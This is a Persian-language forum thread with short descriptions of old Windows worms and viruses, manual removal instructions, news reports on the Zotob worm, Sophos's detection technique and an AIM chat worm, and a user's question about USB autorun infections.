کرم bat.boohoo.worm شامل مجموعه ای از فایل هاست که خود را از طریق مسیرهای به اشتراک گذاشته شده در شبکه منتقل می کند. یکی از فایل های این مجموعه Hiderun.exe نام دارد که برای مخفی کردن اجرای برنامه های مخرب این مجموعه مورد استفاده قرار می گیرد. این کرم فایل های مختلف خود را در شاخه system23 در شاخه ویندوز کپی می کند و یک شناسه کاربری جدید با نام admin1 ایجاد می کند. همچنین با جستجو در شبکه و امتحان کردن رمزهای عبور ساده مانند 12345 سعی در دسترسی به کامپیوترهای دیگر و آلوده کردن آنها می کند. برای حذف این کرم پس از غیر فعال کردن system restore ابتدا پردازه ها و سرویس هایی که توسط آن راه اندازی شده اند متوقف کنید، سپس تغییرات انجام شده در رجیستری را به حالت اول بر گردانید و پس از به روز کردن ویروس یاب خودکامپیوتر را ویروس یابی کنید.برای به دست آوردن اطلاعات لازم در مورد نام پردازه ها و تغییرات ریجستری به آدرس زیر مراجعه کنید.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


ویروس PATE


این ویروس که McAfee آن را با نام W32/PATE و Symantec ( همان Norton ) آن را با نام W32.Pini می شناسد خود را به فایل Explorer.exe می چسباند تا در حافظه باقی بماند. همچنین خود را با نلمهای متغیر و تصادفی و با پسوند exe یا scr کپی میکند. حجم این ویروس تقریبا 177 کیلوبایت است و قسمت هایی از ریجستری را تغییر داده و مقادیری به آن می افزاید. برای پاک کردن آن System Restore ( در ویندوز XP ) را غیر فعال می کنیم. ویروس یاب خود را به روز می کنیم. کامپیوتر را Restart کرده و ویندوز را در حالت Safe Mode اجرا کنید. ( برای اجرای ویندوز در حالت Safe Mode در هنگام بالا آمدن ویندوز کلیدF8 را فشار دهید و از بین انتخاب هایی که خواهید داشت Safe Mode را انتخاب کنید ) سیستم را به طور کامل ویروس یابی کنید تا ویروس ها را شناسایی و پاک کند. برنامه Run را اجرا کرده و به مسیر زیر بروید:

HKEY-CURRENT-USERSOFTWAREMicrosoftWindowsCurrentVersionExplorer

و در قسمت سمت راست پنجره مقدار pint را پیدا کرده و پاک کنید. برای بدست آوردن اطلاعات بیشتر درباره این ویروس می توانید به سلیت زیر مراجعه کنید:


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
__________________

ممنون كولوبيو جان محبت كردي

كرم Zotob از Plug and Play در ويندوز 2000 سواستفاده می‌كند

كرم‌های جديدی در حمله به يك نقص بسيار جدی در سرويس Plug & Play ويندوز 2000 مايكروسافت دخيل بوده‌اند. هفته گذشته دو گونه از يك كرم جديد به نام Zotob، شروع به انتشار كرد، هر چند كه هيچكدام از اين دو گونه به اعتقاد محققين گسترش زيادی پيدا نكردند.

اين كرم‌ها برای انتشار از پورت 445 TCP/IP استفاده كرده‌اند كه در ارتباط با اشتراك فايل ويندوز است و از نقص سيستم Plug and Play نيز برای به دست گرفتن سيستم عامل بهره گرفته است. سپس به كامپيوترهای آلوده دستور داده می‌شود كه تا صدور دستورهای ديگر از يك كانال IRC منتظر بمانند، به آن معنا كه ممكن است از اين كامپيوترها برای حمله به ساير كامپيوترها استفاده شود.

به گفته Johannes Ullrich، مدير ارشد تحقيقات در موسسه The SANS Institute كه از شركت‌های فعال در امر آموزش‌های امنيتی است و در شهر Bethedda ايالت مريلند واقع است، خانواده Zotob همچنين می‌تواند سرويس Windows Update را غيرفعال كرده و دسترسی به برخی سايت‌های شبكه مثل eBay.com و amazon.com را متوقف كند.

او می‌گويد، از آنجا كه Zotob عموما تنها قادر است روی سيستم‌های ويندوز 2000 پچ نشده، اثر بگذارد، زيرا اين سيستم‌ها معمولا دارای يك پورت باز 445 هستند، بعيد به نظر می‌رسد كه سريع منتشر شوند.

سه شنبه گذشته مايكروسافت يك پچ برای نقص موجود در Plug and Play عرضه كرد.

روز دوشنبه، شركت Trend Microsoft وجود دو نوع از Zotob به نام‌های .Zotob.a و.Zotob را گزارش كرد. اين شركت سازنده ضدويروس به Zotob "حمله ناكام" لقب داده و در بيانيه منتشره در روز دوشنبه در مورد گونه‌های ديگری از اين كرم به كاربران هشدار داده است.

كاربران ويندوزهای 95 و 98 و Me در معرض ابتلا به Zotob نيستند. در ويندوزهای XP و Windows Server 2003 ممكن است در بعضی شرايط خاص در معرض ابتلا باشند. البته در صورتی كه registry اين سيستم‌ها چنان دستكاری شود كه به كامپيوتر اجازه دهد، بدون يك login، منابع سيستم را ليست كند، كه اقدام مذكور و در اصطلاح " فعال سازی جلسات Null" خوانده می‌شود. (enabling Null Session).

آقای Ullrich می‌گويد، در ويندوز XP‌ و Windows Server 2003 جلسات Null بصورت پيش‌فرض فعال نمی‌شوند و SANS در آدرس [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] برای كنترل وجود چنين فعال‌سازی‌هايی دستورات چندی را عرضه كرده است. هفته گذشته و تنها چند روز پس از آنكه مايكروسافت وجود اين نقص را اعلام كرد، نمونه‌هايی از كدی را كه می‌شود يك حمله Plug and Play به كار رود به تدريج ظاهر شدند، پس ظهور كرم Zotob ديگر چندان تعجب‌انگيز نبود. كدی كه اخيرا در نقص موجود در مرورگر Internet Explorer ممكن است مورد سو استفاده قرار گيرد، به عموم معرفی شده است، اما شركت SANS هنوز هيچ موردی از سو استفاده از كد مذكور را برای حمله به سيستم‌های مختلف گزارش نكرده است.

مبارزه ژنتيكي با ويروس‌ها

شركت Sophos اعلام كرد كه شيوه جديدي را براي مقابله با ويروس‌ها ابداع كرده است. در اين شيوه جديد، مقابله با ويروس‌ها قبل از ظهور آن‌ها صورت مي‌گيرد.


شركت Sophos، يكي از معتبرترين شركت‌هاي توليدكننده نرم‌افزارهاي امنيتي و ضدويروس اعلام كرد كه شيوه جديدي را براي مقابله با ويروس‌ها ابداع كرده است. در اين شيوه جديد، مقابله با ويروس‌ها قبل از ظهور آن‌ها صورت مي‌گيرد.
فناوري جديد از روش‌هايي كه براي شناسايي ژن‌ها در علم پزشكي استفاده مي‌كند، سود مي برد. همان گونه كه در علم پزشكي با شناخت الگوها، موفق به شناسايي ژن‌ها مي‌گردند، در اين شيوه نيز الگوها و مشخصه‌هاي منحصربه‌فردي از تهديدات، ويروس‌ها و اسپم‌ها ثبت مي‌گردد و در يك بانك اطلاعاتي ضبط مي‌گردد. . سپس از آن علائم و مشخصه‌ها در شناسايي خانواده‌هاي ويروس‌ها يا ويروس‌هاي جديد بهره‌ گرفته مي‌شود.
بنا بر اعلام شركت، اين‌ كار در واقع مانند آن است كه شما DNAهاي ويروس‌ها را نگهداري كرده و مورد بررسي قرار دهيد. در واقع نقطه ضعف اصلي ويروس‌ها در آن است كه اغلب آنها از كدهاي مشابهي استفاده مي‌كنند و همين امر مي‌تواند به شناسايي سريع آن‌ها (خصوصا ويروس‌هاي تغيير شكل يافته) كمك كند.
شركت Sophos از فناوري جديد خود در آخرين نسخه از محصولات امنيتي خود با عنوان Sophos Anti-Virus 5.0 و PureMessage استفاده نموده است. ارائه اين محصولات و ارتقاي نسخه‌‌هاي قديمي به فناوري جديد، از انتهاي ماه فوريه 2005 انجام خواهد گرفت.

يك ويروس رايانه‌اي جديد با كاربران چت مي‌كند

كارشناسان امنيني از شناسايي نخستين كرم اينترنتي خبر مي‌دهند كه با كاربران چت كرده و آنها را به كليك كردن روي يك فايل آلوده فرا مي‌خواند.


به گزارش خبرگزاري ايرنا به نقل از سايت اينترنتي "سي نت نيوز.كام"، ويروس اينترنتي جديد .‪IM‬ ‪ Myspace04.AIM‬كه توسط شركت ارائه‌دهنده خدمات امنيتي "آي ام لاجيك" شناسايي شده، در خدمات مسنجر شركت "اي او ال" با كاربران چت كرده و در صورتي كه كاربر مسنجر به پيغام ارسال شده توسط ويروس پاسخ دهد، ويروس بلافاصله پيغام ديگري براي كاربر ارسال كرده ، او را به كليك كردن روي فايل آلوده ‪ clarissa17.pif‬دعوت كرده و به كاربر اطمينان مي‌دهد كه فايل مذكور آلوده به ويروس نيست.

در صورتي كه كاربر روي لينك موجود در پيغام ويروس كليك كند، فايل آلوده به رايانه كاربر منتقل و ويروس فعال مي‌شود. اين كرم اينترنتي ابتلا نرم افزارهاي امنيتي موجود در رايانه كاربر را غير فعال مي‌كند سپس با دست كاري سيستم عامل رايانه، آن را در برابر نفوذ هكرها آسيب پذير كرده و در نهايت با روشي مشابه، يك نسخه از خود را براي تمامي افراد موجود در فهرست دوستان مسنجر كاربر ارسال مي‌كند و اين در حالي است كه خود كاربر رايانه آلوده نمي‌تواند پيغامهايي كه از رايانه‌اش براي ديگران ارسال مي‌شود، مشاهده كند.

"اندرو برتون" مدير توليد شركت "آي ام لاجيك" اعلام كرد اين نخستين باري است كه ويروسي با قابليت چت كردن با كاربران مشاهده مي‌شود. به گفته "برتون"، هر چند هم اكنون اين ويروس رايانه‌اي گسترش چنداني نيافته و تنها در مسنجر شركت "اي او ال"(‪ (AIM‬مشاهده شده است، اما ظهور آن مي تواند نشانه شيوع نسل كاملا جديدي از ويروسهاي اينترنتي باشد كه با كاربران چت كرده و با فريب آنها را به دانلود فايلهاي آلوده ترغيب مي كنند.

كارشناسان همواره به كاربران مسنجرها درباره كليك كردن روي لينك‌هاي اينترنتي موجود در پيغامهاي دريافتي، حتي درصورت آشنا بودن فرد ارسال كننده پيغام، هشدار داده و استفاده از نرم افزارهاي ضد ويروس به روز نگاري شده را ضروري شمرده اند.

خدمات مسنجر شركت "اي او ال" با نام "اي آي ام"(‪ (AIM‬هم اكنون پركاربرترين خدمات پيغام رسان در اينترنت محسوب شده و خدمات مسنجر "ياهو مسنجر" شركت "ياهو" و ام اس ان مسنجر" شركت "مايكروسافت" پس از "اي آي ام "، از لحاظ تعداد كاربر به ترتيب داراي رتبه‌هاي دوم و سوم هستند.

سلام به همگی ببخشید من یک مشکل دارم هر کس می تونه کمکم کنه: من وقتی فلش رو به کامپیوتر می زنم بدون هیچ اجازه ای فلش باز می شه و هر ویروسی داخلش هست وارد کامپیوتر می شه لطفا کمک کنید ویندوزم 7 است واز وقتی آنتی ویروسم رو به نود ورژن 6 تغییر دادم این مشکل به وجود آمد بنزرم

سلام به همگی ببخشید من یک مشکل دارم هر کس می تونه کمکم کنه: من وقتی فلش رو به کامپیوتر می زنم بدون هیچ اجازه ای فلش باز می شه و هر ویروسی داخلش هست وارد کامپیوتر می شه لطفا کمک کنید ویندوزم 7 است واز وقتی آنتی ویروسم رو به نود ورژن 6 تغییر دادم این مشکل به وجود آمد بنزرم

در تاپیک مربوطه مطرح شود



آنالـیز و پاکسازی سیستم های آلوده(ابتدا پست اول را ببینید و فایل گزارش را آماده کنید) ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



تاپیک اختصاصی محصولات (ESET (NOD32 ←راهنمای تاپیک در پست دوم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])